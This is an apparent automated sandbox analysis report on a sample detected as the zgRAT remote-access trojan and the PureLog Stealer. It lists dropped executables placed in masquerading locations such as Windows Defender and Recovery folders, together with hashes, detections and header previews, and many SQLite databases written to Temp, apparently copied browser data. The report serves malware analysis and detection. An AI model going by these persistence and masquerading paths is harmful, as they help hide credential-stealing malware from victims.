                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1edbb58c, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.42213608311883316
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                MD5:1D3EEAD89220FBC97E2B429C727136DB
                                                                                                SHA1:432405DDDE0732B2CBD7B4E504D704ECFBF8AA4A
                                                                                                SHA-256:68B7A7A6E0C5432A7A5CE46DBBDB388D829E528CEC6F622B04BA2BD2D3588096
                                                                                                SHA-512:7FB941704B0218072D76C196508213B85446E5FBE33C7AAD26530823BC4ED152CAFE1550FA242077CDDCDBF8D81FDDCD52C99B007B53DC1C5D97754B6C328E2C
                                                                                                Malicious:false
                                                                                                Preview:...... .......A.......X\...;...{......................0.!..........{A..9...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................ap.<.9...}i.................$U...9...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Recovery\9e60a5f7a3bd80

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (689), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):689
                                                                                                Entropy (8bit):5.869777810154306
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:JOVNq37HAqICd3K67PgKwWePGwqfGR0elLj8UfIeKoRj6kkWF/AwH7IiMuadXX/:JOV43DAqICd3x7PgK5wZuAfgeKMjPFVs
                                                                                                MD5:CC995AAFFCF4AED7014294DE61621D92
                                                                                                SHA1:0B6780AD4AD1DE0E2D555D09F778A79B76CD183C
                                                                                                SHA-256:9B6D5A24675A70198C16BACF8F09C5BFA97D37592F103074A80794F0A239E0DF
                                                                                                SHA-512:96D1F2889D49D67788B4191FD390F4A4F05DF34DF9319CBFA550896297C37CA99BF1E943E18180BFEB8911B8E1F05462BB7A629CD6B28850864C4C784DA36030
                                                                                                Malicious:false
                                                                                                Preview:TeK3Q42CDKbTAOBMODkgDvZc0yeBb4fMDoQChM8difjQpUlQeRrh4mniErDcZ0kJpPQV89oBFG7hLIwgMOgJN7SbBs7zJfEr4alaEPSfmpcxoFX54gPLUb6s6yUQBy2jCPnuhVb75Bhiefw6UB5mP3Xde3dP4Cdxw2uZbmYiERPT4YNbBY593PTJ1KQo2MD3htvmuXesnWh8oEjGpCOgGe4hilhRVuq2OVwKmlro4MWhrVexkK808hxCzNDI0MW2pptSSYdEUkl4HXzNGurLw04ritVZijxrzd1ClMeMq3fY525cY0BGfKGzuCujCEgvw4Enfwl4Pff2Ugvpy3AshrMoXBSjb5JmXulByR6lOH0ApOeOREvJDyOErZQdeCcTV2ek4u1g7ZdZ0M9JhDRWK9ijfhTYAcGMohowt3TgNOMoUyNeaH6auGIVU4EWacgeSQvTiMZntvJ6x3OrTy83fpciYSczy7FurrWED46NrSr87MhapXDmem9myN4PukywpYOGhKoZ1uLN8dkMuBJb3dQEsuQzArdHd4Ti7a3fsnuubvnUmresbX2LIKYw4yYKQEtEJBPTIosQtgn6G5NTMvqGBHaxBGk4OjdWBjKkbKkwomcmgcq8lF7fYnCClcRBDyBJCR4hum1BK3bYpyQjalSJl77XgI982iszlSjPhIN9O5UfL

                                                                                                C:\Recovery\SystemSettings.exe

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                C:\Recovery\de5836ef699499

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (872), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):872
                                                                                                Entropy (8bit):5.901295000659748
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0oIBsMbz63mM2DnSuiciRL6xJYS76/MW8yEc:bIZ02jSuic9x1sMc
                                                                                                MD5:AA36663A71D70557491693DDE2D07742
                                                                                                SHA1:A0FD0EF1D04221C59EB79B296B79C24D33771A34
                                                                                                SHA-256:7EFDF317B2FFFA228BDE45332173DB26034D4A3DED9E88504B66CEB3776B63D4
                                                                                                SHA-512:3E1AB4E738E0E465296C76A9BD3CA668729557A87F0794372F61A590BB7A5513989A8B6969AC353598227BF6F02B01ACCC4B7BD02A89216F20E7FF9C1FF9426B
                                                                                                Malicious:false
                                                                                                Preview:iETgBmn3JmKlxWPBBRXT5pncL1vMwK6QTtue5AGlWVwrUk09hKqUEM72b0VJ0aG8q3SDmuFBKw6j35IlAvomdmMGw2CFp7u5OxBaSxXxEpJRQX8gstIFveeEqLRusAVNBBVF3rTNY1hyc50Z3fX6ypKuS7uGfmFDT5POB3nAZ5q36qlvU10MnZZW1lw67NrvwdfhplXA2Wg29QxmW8vnv2a3f3XaGqDMN4HcKDFte0TR2gXkxKj8bD93DlBwN64MTUpEIUcS3CJ5jIB9gwn5HEuJ4NYiCTfh6H7i1SbcrQFY4EU5kCQaT8EOjfJ553Qjhl9cKcHNVKO09WP03d7ADEN7Ct8WIghxAf1SE1uI4CFJuOONQTCc6QgdYCabevEymazee7wBtzFA8ENxeuFzeE1u8Y4CbTnJ8RgUYusThAsHLgeTym6tpOUhiEfGCtkaL5Crh2YtBwSeWujc3kNzW4et68vUPmQxZS5Peww5NMr250LyfDMcfvDRbSuiHEeZgfEEyT8HyRmKMlxGx7yLZySoOoyLBNyIrSWavH9LFFoNJ3EzfovJQT9sNazKfxFkddc4PXVp8nGUKEfUj9pXbp2YSnNURyqSADupbKjISGLnMoiI5flgHrJxlDllJAXJ6xUGT02YZhEVeOLnFEZwMKKT46DXj88SsBqZUbzFmNGjmxTX27fFll6wmBMWwfzaiwmciwToOUK9DkqGnqflc2rHE4wTOcSGYpAzK0yFo10Rb7sBUFtG9N8qFfYoA9ZwBDlXj05w1Z7lCaqGLu9JtLHLrUupcKFobEPXWUbdJ6PkPXnpzRcP9QC06aqPGQTqTSJ8KSu0Sf9w6g5UrF0LszpLBZb6oMX3niQ6Npeg

                                                                                                C:\Recovery\uAsLgsGzSk.exe

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\serverBrokerperfMonitor.exe.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):5.356756887109143
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj1GqZ4vtpv
                                                                                                MD5:492A92D0EE9C7BD43DFCEC3E9B5026E2
                                                                                                SHA1:93BC2DF595AA42E5D5EA39524B2BADCA903C964E
                                                                                                SHA-256:03EB4302FE4EAADFA51D085CE53742C2DE6B09FDF2E3D9777E35CA638393135B
                                                                                                SHA-512:B24A61EC3D0E8B44D65DE4DCCCB0BC8EE1F95471FEB72C529217F82B7342AC704EA38A24E698E5AE69BAF31AC28C6C1D8EE11FAEDA6BF49265F29B804B9D5F82
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uAsLgsGzSk.exe.log

                                                                                                Download File
                                                                                                Process:C:\Recovery\uAsLgsGzSk.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulTkklh:NllUokl
                                                                                                MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                                                SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                                                SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                                                SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........

                                                                                                C:\Users\user\AppData\Local\Temp\0A6LWeowbl

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0AqDX7d521

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0LCgrngGO7

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0RI2dvffcM

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0VVz3t22UW

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0YDlTOLbXv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0rXqYuRKkE

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0rnYVCOVhJ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1FTwJT7wX7

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1JzSVNchys

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
